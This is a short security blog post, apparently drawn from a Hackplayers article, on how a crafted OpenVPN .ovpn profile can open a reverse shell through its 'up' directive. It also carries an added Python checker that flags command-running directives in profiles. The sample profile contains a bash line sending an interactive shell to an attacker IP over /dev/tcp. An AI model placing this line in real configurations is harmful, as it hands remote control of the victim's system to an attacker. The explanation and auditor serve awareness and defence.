In today's article we will see how to obtain a reverse shell using OpenVPN configuration files (.ovpn). Using the "up" option, we can execute scripts once the network interface has been set up on the system.
On Linux, we could use bash to create a connection with another computer using "/dev/tcp". For example, in the following configuration file, the last line adds the execution of such a command:
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c '/bin/bash -i > /dev/tcp/[ATTACKER IP]/[ATTACKER PORT] 0<&1 2>&1&'"
When the program executes the configuration, the attacker will receive a shell. This can be used in many OpenVPN configurations, which allow you to run all configuration files in a directory. That is why it is important to specify explicitly which configuration file the program will execute. This can be a good way for the attacker to escalate privileges.
Bash makes this type of attack easier on the most popular Linux distributions. On Windows, things are a little more complicated because there is no counterpart to "/dev/tcp".
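For anyone who receives .ovpn profiles from third parties, the following added example (not part of the original article) audits a profile before it is imported, reporting every directive that makes OpenVPN run an external command or load a plugin, plus the script-security level the profile requests. The function name, the directive list chosen here and the sample profile are assumptions made for this illustration.

```python
import shlex

# OpenVPN directives that run an external command or load a plugin.
EXEC_DIRECTIVES = {
    "up", "down", "ipchange", "route-up", "route-pre-down", "tls-verify",
    "auth-user-pass-verify", "client-connect", "client-disconnect",
    "learn-address", "plugin",
}
# Inline blocks that carry key/certificate material rather than directives.
INLINE_BLOCKS = {"ca", "cert", "key", "dh", "tls-auth", "tls-crypt", "pkcs12", "secret"}

def audit_ovpn(text):
    """Return (findings, script_security_level) for the text of an .ovpn profile."""
    findings, level = [], 1          # OpenVPN's default script-security level is 1
    in_inline = None                 # name of the inline block currently open
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if in_inline:                # skip embedded key/certificate material
            if line == f"</{in_inline}>":
                in_inline = None
            continue
        if not line or line[0] in "#;":
            continue                 # blank line or comment
        if line[:1] == "<" and line[1:-1] in INLINE_BLOCKS:
            in_inline = line[1:-1]
            continue
        try:
            tokens = shlex.split(line, comments=True)
        except ValueError:           # unbalanced quotes: flag rather than guess
            findings.append((lineno, "unparseable", line))
            continue
        name = tokens[0].lstrip("-").lower()   # a leading "--" is tolerated
        if name == "script-security" and len(tokens) > 1 and tokens[1].isdigit():
            level = max(level, int(tokens[1]))
        elif name in EXEC_DIRECTIVES:
            findings.append((lineno, name, " ".join(tokens[1:])))
    return findings, level

# Constructed sample profile; [COMMAND] is a placeholder, not a real command.
SAMPLE = """\
# constructed sample profile, not from a real deployment
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c '[COMMAND]'"
<ca>
up inside inline certificate material is not a directive
</ca>
"""
```

Any finding, or a requested level of 2 or higher, is a reason to read the profile by hand before letting a VPN client or an auto-start service load it.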
On the Hackplayers web page, you can see the full article. Are you a sysadmin? Do you have OpenVPN set to start automatically on any device? Do not hesitate to tell us your impressions.